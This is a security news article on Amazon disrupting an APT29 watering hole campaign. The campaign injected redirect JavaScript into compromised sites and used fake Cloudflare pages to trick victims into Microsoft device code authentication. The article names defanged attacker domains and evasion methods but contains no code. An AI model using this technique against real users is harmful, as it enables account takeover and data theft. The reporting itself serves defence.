Amazon disrupts APT29 watering hole attack using Microsoft Device Code Authentication

On Friday, Amazon reported that it had identified and disrupted an opportunistic watering hole campaign orchestrated by the Russia-linked APT29 actors, aimed at intelligence gathering. The campaign involved compromised websites that redirected visitors to malicious infrastructure, designed to deceive users into authorising attacker-controlled devices through Microsoft’s device code authentication flow, as stated by Amazon’s Chief Information Security Officer, C.J. Moses. APT29, also known as BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, Earth Koshchei, ICECAP, Midnight Blizzard, and The Dukes, is a state-sponsored hacking group associated with Russia’s Foreign Intelligence Service (SVR). Recently, this prolific threat actor has been linked to attacks using malicious Remote Desktop Protocol (RDP) configuration files to target Ukrainian entities and exfiltrate sensitive data.

Since the beginning of the year, APT29 has employed various phishing techniques, including device code phishing and device join phishing, to gain unauthorised access to Microsoft 365 accounts. In June 2025, Google observed a threat cluster affiliated with APT29 that weaponised a Google account feature called application-specific passwords to access victims’ emails, a campaign attributed to UNC6293. The latest activities identified by Amazon’s threat intelligence team highlight APT29’s ongoing efforts to harvest credentials and gather intelligence while refining their tactics. C.J. Moses noted that this opportunistic approach demonstrates APT29’s evolution in expanding their operations for broader intelligence collection.

The attacks involved APT29 compromising legitimate websites and injecting JavaScript that redirected approximately 10% of visitors to actor-controlled domains, such as findcloudflare[.]com, which mimicked Cloudflare verification pages to create an illusion of legitimacy. The ultimate goal of the campaign was to entice victims into entering a legitimate device code generated by the threat actor into a sign-in page, thereby granting access to their Microsoft accounts and data. This technique was previously detailed by both Microsoft and Volexity in February 2025. The activity is notable for its use of various evasion techniques, including Base64 encoding to obscure malicious code, setting cookies to prevent repeated redirects of the same visitor, and shifting to new infrastructure when blocked. Despite the actor’s attempts to migrate to new infrastructure, including a move off AWS to another cloud provider, Amazon’s team continued to track and disrupt their operations. Following their intervention, they observed the actor registering additional domains, such as cloudflare.redirectpartners[.]com, which again sought to lure victims into Microsoft device code authentication.